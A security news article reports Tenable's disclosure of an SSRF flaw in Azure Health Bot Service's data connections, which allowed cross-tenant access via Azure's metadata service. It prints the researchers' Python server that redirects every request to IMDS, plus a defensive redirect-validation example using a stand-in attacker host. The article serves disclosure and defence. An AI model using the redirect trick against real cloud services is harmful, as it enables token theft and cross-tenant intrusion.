Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services
Author: Balaji N
Tenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.
The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.
These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.
Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.
This vulnerability enabled them to bypass existing security filters and access sensitive internal endpoints, such as Azure’s Internal Metadata Service (IMDS).
Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the attackers.
The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they acquired an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.
The Tenable researchers used the following Python script to run the HTTP server that facilitated the SSRF attack:

#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler


def servePage(s, hverb):
    # Pose as an IIS server and answer every request with a 301 pointing at Azure IMDS.
    s.protocol_version = 'HTTP/1.1'
    s.server_version = 'Microsoft-IIS/8.5'
    s.sys_version = ''
    s.send_response(301)
    s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
    s.end_headers()
    message = ""
    s.wfile.write(bytes(message, "utf8"))
    return


class StaticServer(BaseHTTPRequestHandler):
    def do_GET(self):
        servePage(self, "GET")
        return


def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
    # Listen on all interfaces on port 80 (needs privileges) and serve until stopped.
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    httpd.serve_forever()


main()
This host was configured to respond to requests with a 301 redirect response destined for Azure’s IMDS. Using this technique, attackers could obtain a valid metadata response and subsequently obtain an access token for management.azure.com.
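As an added example (not from the article or from Tenable's research), here is the defender-side counterpart: a fetcher for user-supplied data-connection URLs that validates every hop of a redirect chain against link-local, loopback and private address ranges instead of letting the HTTP client follow redirects on its own. The hostnames, addresses and the fake DNS/HTTP stand-ins are constructed so the demo runs offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

def resolve(host):
    """Every address the host maps to (real DNS; demo() swaps in a lookup table instead)."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}

def validate_url(url, resolver=resolve):
    """Check the scheme and every address the host maps to before any request is made."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "scheme not allowed or host missing"
    try:
        ips = {str(ipaddress.ip_address(parts.hostname))}  # literal IP: nothing to resolve
    except ValueError:
        ips = resolver(parts.hostname)
    for ip in map(ipaddress.ip_address, ips):
        # Only public unicast addresses may be fetched; IMDS (169.254.169.254) is link-local.
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved or ip.is_multicast:
            return False, f"{parts.hostname} maps to blocked address {ip}"
    return True, "ok"

def follow_redirects(url, fetch, resolver=resolve, max_hops=5):
    """Walk a redirect chain one hop at a time, re-validating each hop; fetch(url) -> (status, headers)."""
    for _ in range(max_hops + 1):
        ok, why = validate_url(url, resolver)
        if not ok:
            return False, f"blocked at {url}: {why}"
        status, headers = fetch(url)
        if status not in (301, 302, 303, 307, 308):
            return True, url
        if "Location" not in headers:
            return False, "redirect without Location header"
        url = urljoin(url, headers["Location"])
    return False, "too many redirects"

# Constructed offline stand-ins for DNS and HTTP that replay the article's redirect trick.
FAKE_DNS = {"attacker.example": {"51.51.51.51"}, "fhir.example": {"51.51.51.52"}}
IMDS = "http://169.254.169.254/metadata/instance?api-version=2021-12-13"

def fake_fetch(url):
    if urlsplit(url).hostname == "attacker.example":
        return 301, {"Location": IMDS}  # the attacker-controlled host answers with a 301 to IMDS
    return 200, {}

def demo():
    lookup = lambda host: FAKE_DNS[host]
    return (follow_redirects("https://attacker.example/fhir", fake_fetch, lookup),
            follow_redirects("https://fhir.example/fhir", fake_fetch, lookup))
```

A real deployment must also connect to the address it validated rather than resolving the host a second time, otherwise a changing DNS answer can sidestep the check; blocking IMDS on the service's egress path is a second, independent layer.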
Response and Mitigation
Upon discovering the vulnerabilities, Tenable immediately reported them to Microsoft’s Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the report and began implementing fixes.
Tenable later identified another vulnerable endpoint for validating FHIR endpoints’ data connections. Although this endpoint was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes implemented by July 12.
These vulnerabilities underscore the importance of robust web applications and cloud security mechanisms, even in AI-powered services.
While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.